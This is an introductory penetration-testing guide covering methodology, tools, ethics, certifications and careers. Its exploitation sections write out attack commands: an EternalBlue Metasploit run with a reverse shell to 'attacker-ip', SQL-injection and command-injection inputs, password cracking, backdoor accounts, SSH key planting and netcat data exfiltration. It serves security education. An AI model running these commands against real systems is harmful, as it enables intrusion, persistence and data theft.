Introduction to Penetration Testing
What is Penetration Testing?
Penetration testing (pentesting) is the practice of testing a computer system, network, or web application to find security vulnerabilities that an attacker could exploit. It's essentially "ethical hacking" - authorized attempts to breach systems to identify weaknesses before malicious actors do.
Types of Penetration Tests
By Knowledge Level
Black Box Testing
- No prior knowledge of the target
- Simulates external attacker
- Most realistic but time-consuming
- Example: Testing a public website
White Box Testing
- Full knowledge of the target
- Access to source code, architecture
- Most thorough testing
- Example: Internal security audit
Gray Box Testing
- Partial knowledge
- Simulates insider threat
- Balance between black and white
- Example: Testing with user credentials
By Target Type
Network Penetration Testing
- External network testing
- Internal network testing
- Wireless network testing
- Firewall/IDS testing
Web Application Testing
- OWASP Top 10 vulnerabilities
- Authentication/authorization
- Session management
- Input validation
Mobile Application Testing
- iOS/Android apps
- API security
- Data storage
- Communication security
Social Engineering
- Phishing campaigns
- Physical security testing
- Phone/email pretexting
- USB drop tests
Physical Penetration Testing
- Building access
- Lock picking
- Tailgating
- Dumpster diving
Penetration Testing Methodology
1. Planning and Reconnaissance
Scope Definition
- Define targets (IPs, domains, applications)
- Set boundaries (what's off-limits)
- Establish rules of engagement
- Get written authorization
Information Gathering
whois target.com
dig target.com
theHarvester -d target.com -b google
nmap -sn 192.168.1.0/24
nmap -p- target.com
2. Scanning and Enumeration
Port Scanning
nmap -T4 -F target.com
nmap -p- -sV -sC target.com
nmap -sU --top-ports 100 target.com
Service Enumeration
nikto -h http://target.com
dirb http://target.com
enum4linux target.com
smbclient -L //target.com
snmpwalk -v2c -c public target.com
dnsrecon -d target.com
fierce -dns target.com
3. Vulnerability Assessment
Automated Scanning
nikto -h http://target.com
sqlmap -u "http://target.com/page?id=1"
Manual Testing
- Review scan results
- Verify false positives
- Test for logic flaws
- Check for misconfigurations
4. Exploitation
Metasploit Framework
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker-ip
exploit
Web Application Exploitation
sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test" --dbs
<script>alert('XSS')</script>
; ls -la
| cat /etc/passwd
Password Attacks
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
hashcat -m 0 -a 0 hashes.txt wordlist.txt
5. Post-Exploitation
Maintain Access
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
mkdir /home/user/.ssh
echo "ssh-rsa YOUR_KEY" >> /home/user/.ssh/authorized_keys
Privilege Escalation
uname -a
cat /etc/issue
sudo -l
find / -perm -4000 2>/dev/null
systeminfo
whoami /priv
net user
net localgroup administrators
Lateral Movement
- Pass-the-hash
- Pass-the-ticket
- Token impersonation
- Remote execution
Data Exfiltration
tar czf - /sensitive/data | base64 > data.txt
python3 -m http.server 8000
nc -lvp 4444 > file.txt
nc target.com 4444 < file.txt
6. Reporting
Executive Summary
- High-level overview
- Business impact
- Risk assessment
- Recommendations
Technical Details
- Vulnerabilities found
- Exploitation steps
- Proof of concept
- Remediation steps
Report Structure
- Cover page
- Table of contents
- Executive summary
- Methodology
- Findings (by severity)
- Detailed technical analysis
- Recommendations
- Appendices
Essential Tools
Reconnaissance
- Nmap: Network scanner
- Recon-ng: Reconnaissance framework
- TheHarvester: OSINT gathering
- Maltego: Visual link analysis
Vulnerability Scanning
- Nessus: Commercial scanner
- OpenVAS: Open-source scanner
- Nikto: Web server scanner
- WPScan: WordPress scanner
Exploitation
- Metasploit: Exploitation framework
- SQLMap: SQL injection
- BeEF: Browser exploitation
- Social Engineering Toolkit
Post-Exploitation
- Mimikatz: Credential extraction
- PowerSploit: PowerShell toolkit
- Empire: Post-exploitation framework
- BloodHound: Active Directory analysis
Password Cracking
- John the Ripper: Password cracker
- Hashcat: GPU-accelerated cracking
- Hydra: Network login cracker
- CeWL: Custom wordlist generator
Web Application Testing
- Burp Suite: Web proxy
- OWASP ZAP: Web scanner
- Nikto: Web server scanner
- WFuzz: Web fuzzer
Common Vulnerabilities
OWASP Top 10 (2021)
- Broken Access Control
- Cryptographic Failures
- Injection
- Insecure Design
- Security Misconfiguration
- Vulnerable Components
- Authentication Failures
- Software and Data Integrity Failures
- Security Logging Failures
- Server-Side Request Forgery
Network Vulnerabilities
- Weak passwords
- Unpatched systems
- Misconfigured services
- Default credentials
- Unnecessary services
- Weak encryption
Legal and Ethical Considerations
Legal Requirements
- Written authorization: Always required
- Scope agreement: Clear boundaries
- Non-disclosure: Protect client data
- Compliance: Follow regulations (GDPR, HIPAA)
Ethical Guidelines
- Do no harm: Don't damage systems
- Respect privacy: Handle data responsibly
- Report honestly: Disclose all findings
- Professional conduct: Maintain standards
Certifications
- CEH: Certified Ethical Hacker
- OSCP: Offensive Security Certified Professional
- GPEN: GIAC Penetration Tester
- eJPT: eLearnSecurity Junior Penetration Tester
- PNPT: Practical Network Penetration Tester
Practice Platforms
Online Labs
- Hack The Box: Realistic pentesting labs
- TryHackMe: Guided learning paths
- PentesterLab: Web application security
- HackTheBox Academy: Structured courses
Vulnerable Applications
- DVWA: Damn Vulnerable Web Application
- WebGoat: OWASP training app
- Metasploitable: Vulnerable Linux VM
- OWASP Juice Shop: Modern web app
CTF Platforms
- CTFtime: CTF calendar and rankings
- PicoCTF: Beginner-friendly CTF
- OverTheWire: Wargames
- Root-Me: Challenges and CTFs
Best Practices
Before Testing
- Get written authorization
- Define clear scope
- Establish communication channels
- Prepare testing environment
- Backup important data
During Testing
- Document everything
- Take screenshots
- Save command outputs
- Note timestamps
- Track credentials found
After Testing
- Secure findings
- Write comprehensive report
- Present to stakeholders
- Assist with remediation
- Perform retest if needed
Building Your Lab
Hardware
- Dedicated machine or VM host
- 16GB+ RAM recommended
- 500GB+ storage
- Network isolation capability
Software
- Attacker: ParrotOS/Kali Linux
- Targets: Metasploitable, DVWA, Windows VMs
- Network: pfSense firewall
- Monitoring: Security Onion
Network Setup
Internet
|
[Router]
|
[Switch]
|
+--- [Attacker VM]
+--- [Target VMs]
+--- [Monitoring]
Career Path
Entry Level
- Security Analyst
- Junior Penetration Tester
- SOC Analyst
Mid Level
- Penetration Tester
- Security Consultant
- Red Team Operator
Senior Level
- Senior Penetration Tester
- Security Architect
- Red Team Lead
Salary Ranges (USD)
- Entry: $60k-$80k
- Mid: $80k-$120k
- Senior: $120k-$180k+
Next Steps
- Practice on vulnerable VMs
- Complete online courses
- Participate in CTFs
- Build your home lab
- Get certified
- Join bug bounty programs
- Contribute to open source
- Network with professionals
Resources
- Books: "The Web Application Hacker's Handbook", "Penetration Testing" by Georgia Weidman
- Courses: Offensive Security, eLearnSecurity, Cybrary
- Communities: Reddit r/netsec, Discord servers, local meetups
- Blogs: PortSwigger, Offensive Security, Pentester Academy